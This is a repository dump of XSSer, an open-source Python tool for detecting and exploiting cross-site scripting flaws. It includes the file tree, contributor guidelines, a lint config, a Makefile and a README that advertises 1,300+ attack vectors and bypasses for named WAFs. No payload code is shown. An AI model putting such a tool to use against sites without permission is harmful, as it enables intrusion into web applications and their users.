├── .gitattributes
├── .github
│   ├── CODE_OF_CONDUCT.md
│   ├── CONTRIBUTING.md
│   └── ISSUE_TEMPLATE
│       ├── bug_report.md
│       └── feature_request.md
├── .gitignore
├── .pylintrc
├── Makefile
├── README.md
├── core
│   ├── __init__.py
│   ├── crawler.py
│   ├── curlcontrol.py
│   ├── dork.py
│   ├── driver
│   │   └── geckodriver
│   ├── encdec.py
│   ├── flashxss.py
│   ├── fuzzing
│   │   ├── DCP.py
│   │   ├── DOM.py
│   │   ├── HTTPsr.py
│   │   ├── __init__.py
│   │   ├── dorks.txt
│   │   ├── heuristic.py
│   │   ├── user-agents.txt
│   │   └── vectors.py
│   ├── globalmap.py
│   ├── gtkcontroller.py
│   ├── imagexss.py
│   ├── main.py
│   ├── mozchecker.py
│   ├── options.py
│   ├── post
│   │   ├── __init__.py
│   │   └── xml_exporter.py
│   ├── randomip.py
│   ├── reporter.py
│   ├── threadpool.py
│   ├── tokenhub.py
│   ├── twsupport.py
│   └── update.py
├── doc
│   ├── AUTHOR
│   ├── CHANGELOG
│   ├── COMMITMENT
│   ├── COPYING
│   ├── INSTALL
│   ├── MANIFESTO
│   ├── README
│   └── requirements.txt
├── gtk
│   ├── docs
│   │   ├── about.txt
│   │   ├── wizard0.txt
│   │   ├── wizard1.txt
│   │   ├── wizard2.txt
│   │   ├── wizard3.txt
│   │   ├── wizard4.txt
│   │   ├── wizard5.txt
│   │   └── wizard6.txt
│   ├── images
│   │   ├── world.png
│   │   ├── xsser.jpg
│   │   ├── xssericon_16x16.png
│   │   ├── xssericon_24x24.png
│   │   └── xssericon_32x32.png
│   ├── map
│   │   └── GeoIP.dat
│   ├── xsser.desktop
│   └── xsser.ui
├── setup.py
└── xsser
/.gitattributes: -------------------------------------------------------------------------------- 1 | *.conf text eol=lf 2 | *.md text eol=lf 3 | *.md5 text eol=lf 4 | *.py text eol=lf 5 | *.xml text eol=lf 6 | LICENSE text eol=lf 7 | COMMITMENT text eol=lf 8 | 9 | *_ binary 10 | *.dll binary 11 | *.pdf binary 12 | *.so binary 13 | *.wav binary 14 | *.zip binary 15 | *.x32 binary 16 | *.x64 binary 17 | *.exe binary 18 | *.sln binary 19 | *.vcproj binary 20 | 21 | -------------------------------------------------------------------------------- /.github/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. 6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. 
Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project leader at epsylon@riseup.net. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] 44 | 45 | [homepage]: http://contributor-covenant.org 46 | [version]: http://contributor-covenant.org/version/1/4/ 47 | 48 | -------------------------------------------------------------------------------- /.github/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to XSSer 2 | 3 | ## Reporting bugs 4 | 5 | Please report all bugs on the [issue tracker](https://github.com/epsylon/xsser/issues). 6 | 7 | ### Guidelines 8 | 9 | * Before you submit a bug report, search both [open](https://github.com/epsylon/xsser/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/epsylon/xsser/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. 
10 | 11 | * Make sure you can reproduce the bug with the latest development version of xsser. 12 | 13 | * Your report should give detailed instructions on how to reproduce the problem. If xsser raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. 14 | 15 | * If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* 16 | 17 | ## Submitting code changes 18 | 19 | All code contributions are greatly appreciated. 20 | 21 | Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). 22 | 23 | ### Guidelines 24 | 25 | In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: 26 | 27 | * Each patch should make one logical change. 28 | * Avoid tabs; use four spaces instead. 29 | * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:epsylon@riseup.net). 30 | * Do not change the style of numerous files in a single pull request; we can [discuss](mailto:epsylon@riseup.net) any major restyling beforehand, but be aware that personal preferences without strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) are likely to be rejected. 31 | * Change fewer than five files per pull request - there is rarely a good reason to touch more than five files in one pull request, and doing so dramatically increases the review time required to land (commit) it. 32 | * Style that differs too much from the main branch will be "adapted" by the developers.
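The "one logical change per patch" workflow above can be sketched locally; the repository, branch, file, and commit names below are purely illustrative (in practice you would clone your own GitHub fork of xsser and push the branch there before opening the pull request):

```shell
set -e

# Stand-in for a cloned fork (illustrative only):
git init -q xsser-demo && cd xsser-demo
git config user.email "you@example.com"
git config user.name "You"
printf 'print("hello")\n' > demo.py
git add demo.py && git commit -qm "Initial commit"

# One logical change per branch/patch:
git checkout -qb fix-demo-greeting
printf 'print("hi")\n' > demo.py          # edit with 4-space indents, no tabs
git commit -qam "Fix demo greeting"

git log --oneline                         # a single, focused change on top
```

Keeping each branch to one focused commit like this is what makes the sub-five-file review guideline workable.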
33 | 34 | ### Licensing 35 | 36 | By submitting code contributions to the xsser developers, whether via Git pull request or by checking them into the xsser source code repository, it is understood (unless you specify otherwise) that you are offering the xsser copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions for your contributions, just say so when you send them. 37 | 38 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: bug report 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | 1. Run '...' 15 | 2. See error 16 | 17 | **Expected behavior** 18 | A clear and concise description of what you expected to happen. 19 | 20 | **Screenshots** 21 | If applicable, add screenshots to help explain your problem. 22 | 23 | **Running environment:** 24 | - XSSer version [e.g. 1.8.2] 25 | - Installation method [e.g. git] 26 | - Operating system: [e.g. Debian 4.19.16-1~bpo9+1 (2019-02-07) ] 27 | - Python version [e.g. 3.7] 28 | 29 | **Target details:** 30 | - XSS techniques found by xsser [e.g. DOM-Based XSS] 31 | - WAF/IPS [if any] 32 | - Relevant console output [if any] 33 | - Exception traceback [if any] 34 | 35 | **Additional context** 36 | Add any other context about the problem here.
37 | 38 | --- 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: feature request 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | 22 | --- 23 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.py[cod] 3 | -------------------------------------------------------------------------------- /.pylintrc: -------------------------------------------------------------------------------- 1 | # Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker 2 | 3 | [MASTER] 4 | 5 | # Specify a configuration file. 6 | #rcfile= 7 | 8 | # Python code to execute, usually for sys.path manipulation such as 9 | # pygtk.require(). 10 | init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))" 11 | 12 | # Add files or directories to the blacklist. They should be base names, not 13 | # paths. 14 | ignore= 15 | 16 | # Pickle collected data for later comparisons. 
17 | persistent=no 18 | 19 | # List of plugins (comma-separated Python module names) to load, 20 | # usually to register additional checkers. 21 | load-plugins= 22 | 23 | # Use multiple processes to speed up Pylint. 24 | # DO NOT CHANGE THIS: values >1 hide results! 25 | jobs=1 26 | 27 | # Allow loading of arbitrary C extensions. Extensions are imported into the 28 | # active Python interpreter and may run arbitrary code. 29 | unsafe-load-any-extension=no 30 | 31 | # A comma-separated list of package or module names from where C extensions may 32 | # be loaded. Extensions are loaded into the active Python interpreter and may 33 | # run arbitrary code. 34 | extension-pkg-whitelist= 35 | 36 | # Allow optimization of some AST trees. This will activate a peephole AST 37 | # optimizer, which will apply various small optimizations. For instance, it can 38 | # be used to obtain the result of joining multiple strings with the addition 39 | # operator. Joining a lot of strings can lead to a maximum recursion error in 40 | # Pylint and this flag can prevent that. It has one side effect: the resulting 41 | # AST will be different from the real one. 42 | optimize-ast=no 43 | 44 | 45 | [MESSAGES CONTROL] 46 | 47 | # Only show warnings with the listed confidence levels. Leave empty to show 48 | # all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED 49 | confidence= 50 | 51 | # Enable the message, report, category or checker with the given id(s). You can 52 | # either give multiple identifiers separated by commas (,) or use this option 53 | # multiple times. See also the "--disable" option for examples.
54 | disable=all 55 | 56 | enable=import-error, 57 | import-self, 58 | reimported, 59 | wildcard-import, 60 | misplaced-future, 61 | deprecated-module, 62 | unpacking-non-sequence, 63 | invalid-all-object, 64 | undefined-all-variable, 65 | used-before-assignment, 66 | cell-var-from-loop, 67 | global-variable-undefined, 68 | redefine-in-handler, 69 | unused-import, 70 | unused-wildcard-import, 71 | global-variable-not-assigned, 72 | undefined-loop-variable, 73 | global-at-module-level, 74 | bad-open-mode, 75 | redundant-unittest-assert, 76 | boolean-datetime, 77 | deprecated-method, 78 | anomalous-unicode-escape-in-string, 79 | anomalous-backslash-in-string, 80 | not-in-loop, 81 | continue-in-finally, 82 | abstract-class-instantiated, 83 | star-needs-assignment-target, 84 | duplicate-argument-name, 85 | return-in-init, 86 | too-many-star-expressions, 87 | nonlocal-and-global, 88 | return-outside-function, 89 | return-arg-in-generator, 90 | invalid-star-assignment-target, 91 | bad-reversed-sequence, 92 | nonexistent-operator, 93 | yield-outside-function, 94 | init-is-generator, 95 | nonlocal-without-binding, 96 | lost-exception, 97 | assert-on-tuple, 98 | dangerous-default-value, 99 | duplicate-key, 100 | useless-else-on-loop, 101 | expression-not-assigned, 102 | confusing-with-statement, 103 | unnecessary-lambda, 104 | pointless-statement, 105 | pointless-string-statement, 106 | unnecessary-pass, 107 | unreachable, 108 | using-constant-test, 109 | bad-super-call, 110 | missing-super-argument, 111 | slots-on-old-class, 112 | super-on-old-class, 113 | property-on-old-class, 114 | not-an-iterable, 115 | not-a-mapping, 116 | format-needs-mapping, 117 | truncated-format-string, 118 | missing-format-string-key, 119 | mixed-format-string, 120 | too-few-format-args, 121 | bad-str-strip-call, 122 | too-many-format-args, 123 | bad-format-character, 124 | format-combined-specification, 125 | bad-format-string-key, 126 | bad-format-string, 127 | missing-format-attribute, 128 |
missing-format-argument-key, 129 | unused-format-string-argument, 130 | unused-format-string-key, 131 | invalid-format-index, 132 | bad-indentation, 133 | mixed-indentation, 134 | unnecessary-semicolon, 135 | lowercase-l-suffix, 136 | invalid-encoded-data, 137 | unpacking-in-except, 138 | import-star-module-level, 139 | long-suffix, 140 | old-octal-literal, 141 | old-ne-operator, 142 | backtick, 143 | old-raise-syntax, 144 | metaclass-assignment, 145 | next-method-called, 146 | dict-iter-method, 147 | dict-view-method, 148 | indexing-exception, 149 | raising-string, 150 | using-cmp-argument, 151 | cmp-method, 152 | coerce-method, 153 | delslice-method, 154 | getslice-method, 155 | hex-method, 156 | nonzero-method, 157 | t-method, 158 | setslice-method, 159 | old-division, 160 | logging-format-truncated, 161 | logging-too-few-args, 162 | logging-too-many-args, 163 | logging-unsupported-format, 164 | logging-format-interpolation, 165 | invalid-unary-operand-type, 166 | unsupported-binary-operation, 167 | not-callable, 168 | redundant-keyword-arg, 169 | assignment-from-no-return, 170 | assignment-from-none, 171 | not-context-manager, 172 | repeated-keyword, 173 | missing-kwoa, 174 | no-value-for-parameter, 175 | invalid-sequence-index, 176 | invalid-slice-index, 177 | unexpected-keyword-arg, 178 | unsupported-membership-test, 179 | unsubscriptable-object, 180 | access-member-before-definition, 181 | method-hidden, 182 | assigning-non-slot, 183 | duplicate-bases, 184 | inconsistent-mro, 185 | inherit-non-class, 186 | invalid-slots, 187 | invalid-slots-object, 188 | no-method-argument, 189 | no-self-argument, 190 | unexpected-special-method-signature, 191 | non-iterator-returned, 192 | arguments-differ, 193 | signature-differs, 194 | bad-staticmethod-argument, 195 | non-parent-init-called, 196 | bad-except-order, 197 | catching-non-exception, 198 | bad-exception-context, 199 | notimplemented-raised, 200 | raising-bad-type, 201 | raising-non-exception, 202 |
misplaced-bare-raise, 203 | duplicate-except, 204 | nonstandard-exception, 205 | binary-op-exception, 206 | not-async-context-manager, 207 | yield-inside-async-function 208 | 209 | # Needs investigation: 210 | # abstract-method (might be indicating a bug? probably not though) 211 | # protected-access (requires some refactoring) 212 | # attribute-defined-outside-init (requires some refactoring) 213 | # super-init-not-called (requires some cleanup) 214 | 215 | # Things we'd like to enable someday: 216 | # redefined-builtin (requires a bunch of work to clean up our code first) 217 | # redefined-outer-name (requires a bunch of work to clean up our code first) 218 | # undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760) 219 | # no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73) 220 | # unused-argument (need to clean up or code a lot, e.g. prefix unused_?) 221 | # function-redefined (@overload causes lots of spurious warnings) 222 | # too-many-function-args (@overload causes spurious warnings... I think) 223 | # parameter-unpacking (needed for eventual Python 3 compat) 224 | # print-statement (needed for eventual Python 3 compat) 225 | # filter-builtin-not-iterating (Python 3) 226 | # map-builtin-not-iterating (Python 3) 227 | # range-builtin-not-iterating (Python 3) 228 | # zip-builtin-not-iterating (Python 3) 229 | # many others relevant to Python 3 230 | # unused-variable (a little work to cleanup, is all) 231 | 232 | # ... 233 | [REPORTS] 234 | 235 | # Set the output format. Available formats are text, parseable, colorized, msvs 236 | # (visual studio) and html. You can also give a reporter class, eg 237 | # mypackage.mymodule.MyReporterClass. 238 | output-format=parseable 239 | 240 | # Put messages in a separate file for each module / package specified on the 241 | # command line instead of printing them on stdout. 
Reports (if any) will be 242 | # written in a file named "pylint_global.[txt|html]". 243 | files-output=no 244 | 245 | # Tells whether to display a full report or only the messages 246 | reports=no 247 | 248 | # Python expression which should return a note less than 10 (10 is the highest 249 | # note). You have access to the variables error, warning, refactor, convention 250 | # and statement, which respectively contain the number of messages of each 251 | # category and the total number of statements analyzed. This is used by the 252 | # global evaluation report (RP0004). 253 | evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) 254 | 255 | # Template used to display messages. This is a python new-style format string 256 | # used to format the message information. See doc for all details 257 | #msg-template= 258 | 259 | 260 | [LOGGING] 261 | 262 | # Logging modules to check that the string format arguments are in logging 263 | # function parameter format 264 | logging-modules=logging 265 | 266 | 267 | [FORMAT] 268 | 269 | # Maximum number of characters on a single line. 270 | max-line-length=100 271 | 272 | # Regexp for a line that is allowed to be longer than the limit. 273 | ignore-long-lines=^\s*(# )?<?https?://\S+>?$ 274 | 275 | # Allow the body of an if to be on the same line as the test if there is no 276 | # else. 277 | single-line-if-stmt=no 278 | 279 | # List of optional constructs for which whitespace checking is disabled. `dict- 280 | # separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}. 281 | # `trailing-comma` allows a space between comma and closing bracket: (a, ). 282 | # `empty-line` allows space-only lines. 283 | no-space-check=trailing-comma,dict-separator 284 | 285 | # Maximum number of lines in a module 286 | max-module-lines=1000 287 | 288 | # String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 289 | # tab).
290 | indent-string=' ' 291 | 292 | # Number of spaces of indent required inside a hanging or continued line. 293 | indent-after-paren=4 294 | 295 | # Expected format of line ending, e.g. empty (any line ending), LF or CRLF. 296 | expected-line-ending-format= 297 | 298 | 299 | [TYPECHECK] 300 | 301 | # Tells whether missing members accessed in mixin class should be ignored. A 302 | # mixin class is detected if its name ends with "mixin" (case insensitive). 303 | ignore-mixin-members=yes 304 | 305 | # List of module names for which member attributes should not be checked 306 | # (useful for modules/projects where namespaces are manipulated during runtime 307 | # and thus existing member attributes cannot be deduced by static analysis). It 308 | # supports qualified module names, as well as Unix pattern matching. 309 | ignored-modules=thirdparty.six.moves 310 | 311 | # List of class names for which member attributes should not be checked 312 | # (useful for classes with attributes dynamically set). This supports 313 | # qualified names. 314 | ignored-classes= 315 | 316 | # List of members which are set dynamically and missed by pylint inference 317 | # system, and so shouldn't trigger E1101 when accessed. Python regular 318 | # expressions are accepted. 319 | generated-members= 320 | 321 | 322 | [VARIABLES] 323 | 324 | # Tells whether we should check for unused import in __init__ files. 325 | init-import=no 326 | 327 | # A regular expression matching the name of dummy variables (i.e. expectedly 328 | # not used). 329 | dummy-variables-rgx=_$|dummy 330 | 331 | # List of additional names supposed to be defined in builtins. Remember that 332 | # you should avoid defining new builtins when possible. 333 | additional-builtins= 334 | 335 | # List of strings which can identify a callback function by name. A callback 336 | # name must start or end with one of those strings.
337 | callbacks=cb_,_cb 338 | 339 | 340 | [SIMILARITIES] 341 | 342 | # Minimum number of lines for a similarity. 343 | min-similarity-lines=4 344 | 345 | # Ignore comments when computing similarities. 346 | ignore-comments=yes 347 | 348 | # Ignore docstrings when computing similarities. 349 | ignore-docstrings=yes 350 | 351 | # Ignore imports when computing similarities. 352 | ignore-imports=no 353 | 354 | 355 | [SPELLING] 356 | 357 | # Spelling dictionary name. Available dictionaries: none. To make it work, 358 | # install the python-enchant package. 359 | spelling-dict= 360 | 361 | # List of comma separated words that should not be checked. 362 | spelling-ignore-words= 363 | 364 | # A path to a file that contains the private dictionary; one word per line. 365 | spelling-private-dict-file= 366 | 367 | # Tells whether to store unknown words to the private dictionary indicated in 368 | # the --spelling-private-dict-file option instead of raising a message. 369 | spelling-store-unknown-words=no 370 | 371 | 372 | [MISCELLANEOUS] 373 | 374 | # List of note tags to take into consideration, separated by a comma. 375 | notes=FIXME,XXX,TODO 376 | 377 | 378 | [BASIC] 379 | 380 | # List of builtin function names that should not be used, separated by a comma 381 | bad-functions=map,filter,input 382 | 383 | # Good variable names which should always be accepted, separated by a comma 384 | good-names=i,j,k,ex,Run,_ 385 | 386 | # Bad variable names which should always be refused, separated by a comma 387 | bad-names=foo,bar,baz,toto,tutu,tata 388 | 389 | # Colon-delimited sets of names that determine each other's naming style when 390 | # the name regexes allow several styles.
391 | name-group= 392 | 393 | # Include a hint for the correct naming format with invalid-name 394 | include-naming-hint=no 395 | 396 | # Regular expression matching correct function names 397 | function-rgx=[a-z_][a-z0-9_]{2,30}$ 398 | 399 | # Naming hint for function names 400 | function-name-hint=[a-z_][a-z0-9_]{2,30}$ 401 | 402 | # Regular expression matching correct variable names 403 | variable-rgx=[a-z_][a-z0-9_]{2,30}$ 404 | 405 | # Naming hint for variable names 406 | variable-name-hint=[a-z_][a-z0-9_]{2,30}$ 407 | 408 | # Regular expression matching correct constant names 409 | const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ 410 | 411 | # Naming hint for constant names 412 | const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$ 413 | 414 | # Regular expression matching correct attribute names 415 | attr-rgx=[a-z_][a-z0-9_]{2,30}$ 416 | 417 | # Naming hint for attribute names 418 | attr-name-hint=[a-z_][a-z0-9_]{2,30}$ 419 | 420 | # Regular expression matching correct argument names 421 | argument-rgx=[a-z_][a-z0-9_]{2,30}$ 422 | 423 | # Naming hint for argument names 424 | argument-name-hint=[a-z_][a-z0-9_]{2,30}$ 425 | 426 | # Regular expression matching correct class attribute names 427 | class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ 428 | 429 | # Naming hint for class attribute names 430 | class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ 431 | 432 | # Regular expression matching correct inline iteration names 433 | inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ 434 | 435 | # Naming hint for inline iteration names 436 | inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$ 437 | 438 | # Regular expression matching correct class names 439 | class-rgx=[A-Z_][a-zA-Z0-9]+$ 440 | 441 | # Naming hint for class names 442 | class-name-hint=[A-Z_][a-zA-Z0-9]+$ 443 | 444 | # Regular expression matching correct module names 445 | module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ 446 | 447 | # Naming hint for module names 448 | 
module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ 449 | 450 | # Regular expression matching correct method names 451 | method-rgx=[a-z_][a-z0-9_]{2,30}$ 452 | 453 | # Naming hint for method names 454 | method-name-hint=[a-z_][a-z0-9_]{2,30}$ 455 | 456 | # Regular expression which should only match function or class names that do 457 | # not require a docstring. 458 | no-docstring-rgx=^_ 459 | 460 | # Minimum line length for functions/classes that require docstrings; shorter 461 | # ones are exempt. 462 | docstring-min-length=-1 463 | 464 | 465 | [ELIF] 466 | 467 | # Maximum number of nested blocks for function / method body 468 | max-nested-blocks=5 469 | 470 | 471 | [IMPORTS] 472 | 473 | # Deprecated modules which should not be used, separated by a comma 474 | deprecated-modules=regsub,TERMIOS,Bastion,rexec 475 | 476 | # Create a graph of all (i.e. internal and external) dependencies in the 477 | # given file (report RP0402 must not be disabled) 478 | import-graph= 479 | 480 | # Create a graph of external dependencies in the given file (report RP0402 must 481 | # not be disabled) 482 | ext-import-graph= 483 | 484 | # Create a graph of internal dependencies in the given file (report RP0402 must 485 | # not be disabled) 486 | int-import-graph= 487 | 488 | 489 | [DESIGN] 490 | 491 | # Maximum number of arguments for function / method 492 | max-args=5 493 | 494 | # Argument names that match this expression will be ignored. Defaults to names 495 | # with a leading underscore. 496 | ignored-argument-names=_.* 497 | 498 | # Maximum number of locals for function / method body 499 | max-locals=15 500 | 501 | # Maximum number of return / yield statements for function / method body 502 | max-returns=6 503 | 504 | # Maximum number of branches for function / method body 505 | max-branches=12 506 | 507 | # Maximum number of statements in function / method body 508 | max-statements=50 509 | 510 | # Maximum number of parents for a class (see R0901).
511 | max-parents=7 512 | 513 | # Maximum number of attributes for a class (see R0902). 514 | max-attributes=7 515 | 516 | # Minimum number of public methods for a class (see R0903). 517 | min-public-methods=2 518 | 519 | # Maximum number of public methods for a class (see R0904). 520 | max-public-methods=20 521 | 522 | # Maximum number of boolean expressions in an if statement 523 | max-bool-expr=5 524 | 525 | 526 | [CLASSES] 527 | 528 | # List of method names used to declare (i.e. assign) instance attributes. 529 | defining-attr-methods=__init__,__new__,setUp 530 | 531 | # List of valid names for the first argument in a class method. 532 | valid-classmethod-first-arg=cls 533 | 534 | # List of valid names for the first argument in a metaclass class method. 535 | valid-metaclass-classmethod-first-arg=mcs 536 | 537 | # List of member names, which should be excluded from the protected access 538 | # warning. 539 | exclude-protected=_asdict,_fields,_replace,_source,_make 540 | 541 | 542 | [EXCEPTIONS] 543 | 544 | # Exceptions that will emit a warning when being caught.
Defaults to 545 | # "Exception" 546 | overgeneral-exceptions=Exception 547 | 548 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # $Id: Makefile,v 1.6 2008/10/29 01:01:35 ghantoos Exp $ 2 | # 3 | PYTHON=`which python` 4 | DESTDIR=/ 5 | BUILDIR=$(CURDIR)/debian/xsser 6 | PROJECT=xsser 7 | VERSION=1.8.4 8 | 9 | all: 10 | @echo "make source - Create source package" 11 | @echo "make install - Install on local system" 12 | @echo "make buildrpm - Generate a rpm package" 13 | @echo "make builddeb - Generate a deb package" 14 | @echo "make clean - Get rid of scratch and byte files" 15 | 16 | source: 17 | $(PYTHON) setup.py sdist $(COMPILE) 18 | 19 | install: 20 | $(PYTHON) setup.py install --root $(DESTDIR) $(COMPILE) 21 | 22 | buildrpm: 23 | $(PYTHON) setup.py bdist_rpm --post-install=rpm/postinstall --pre-uninstall=rpm/preuninstall 24 | 25 | builddeb: 26 | $(PYTHON) setup.py sdist $(COMPILE) --dist-dir=../ 27 | rename -f 's/$(PROJECT)-(.*)\.tar\.gz/$(PROJECT)_$$1\.orig\.tar\.gz/' ../* 28 | dpkg-buildpackage -i -I -rfakeroot 29 | 30 | clean: 31 | $(PYTHON) setup.py clean 32 | $(MAKE) -f $(CURDIR)/debian/rules clean 33 | rm -rf build/ MANIFEST 34 | find . -name '*.pyc' -delete 35 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![XSSer](https://xsser.03c8.net/xsser/thehive1.png "XSSer") 2 | 3 | ---------- 4 | 5 | + Web: https://xsser.03c8.net 6 | 7 | ---------- 8 | 9 | Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. 10 | 11 | It provides several options to try to bypass certain filters and various special techniques for code injection. 
12 | 13 | XSSer ships with more than 1,300 pre-installed XSS attack vectors and can bypass filters and exploit code on several browsers/WAFs: 14 | 15 | [PHPIDS]: PHP-IDS 16 | [Imperva]: Imperva Incapsula WAF 17 | [WebKnight]: WebKnight WAF 18 | [F5]: F5 Big IP WAF 19 | [Barracuda]: Barracuda WAF 20 | [ModSec]: Mod-Security 21 | [QuickDF]: QuickDefense 22 | [Sucuri]: SucuriWAF 23 | [Chrome]: Google Chrome 24 | [IE]: Internet Explorer 25 | [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel 26 | [NS-IE]: Netscape in IE rendering engine mode 27 | [NS-G]: Netscape in the Gecko rendering engine mode 28 | [Opera]: Opera Browser 29 | 30 | ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSer URL Generation Schema") 31 | 32 | ---------- 33 | 34 | #### Installing: 35 | 36 | XSSer runs on many platforms. It requires Python (3.x) and the following libraries: 37 | 38 | - python3-pycurl - Python bindings to libcurl (Python 3) 39 | - python3-bs4 - error-tolerant HTML parser for Python 3 40 | - python3-geoip - Python 3 bindings for the GeoIP IP-to-country resolver library 41 | - python3-gi - Python 3 bindings for gobject-introspection libraries 42 | - python3-cairocffi - cffi-based cairo bindings for Python 3 43 | - python3-selenium - Python 3 bindings for Selenium 44 | - firefoxdriver - Firefox WebDriver support 45 | 46 | On Debian-based systems (e.g. Ubuntu), run: 47 | 48 | sudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-gi python3-cairocffi python3-selenium firefoxdriver 49 | 50 | On other systems (e.g. Kali, ParrotSec, ArchLinux, Fedora),
also run: 51 | 52 | sudo pip3 install pycurl bs4 pygeoip gobject cairocffi selenium 53 | 54 | #### Source libs: 55 | 56 | * Python: https://www.python.org/downloads/ 57 | * PyCurl: http://pycurl.sourceforge.net/ 58 | * PyBeautifulSoup4: https://pypi.org/project/beautifulsoup4/ 59 | * PyGeoIP: https://pypi.org/project/pygeoip/ 60 | * PyGObject: https://pypi.org/project/gobject/ 61 | * PyCairocffi: https://pypi.org/project/cairocffi/ 62 | * PySelenium: https://pypi.org/project/selenium/ 63 | 64 | ---------- 65 | 66 | #### License: 67 | 68 | XSSer is released under the GPLv3. You can find the full license text 69 | in the [LICENSE](./docs/LICENSE) file. 70 | 71 | ---------- 72 | 73 | #### Screenshots: 74 | 75 | ![XSSer](https://xsser.03c8.net/xsser/thehive2.png "XSSer Shell") 76 | 77 | ![XSSer](https://xsser.03c8.net/xsser/thehive3.png "XSSer Manifesto") 78 | 79 | ![XSSer](https://xsser.03c8.net/xsser/thehive4.png "XSSer Configuration") 80 | 81 | ![XSSer](https://xsser.03c8.net/xsser/thehive5.png "XSSer Bypassers") 82 | 83 | ![XSSer](https://xsser.03c8.net/xsser/thehive6.png "XSSer [HTTP GET] [LOCAL] Reverse Exploit") 84 | 85 | ![XSSer](https://xsser.03c8.net/xsser/thehive7.png "XSSer [HTTP POST] [REMOTE] Reverse Exploit") 86 | 87 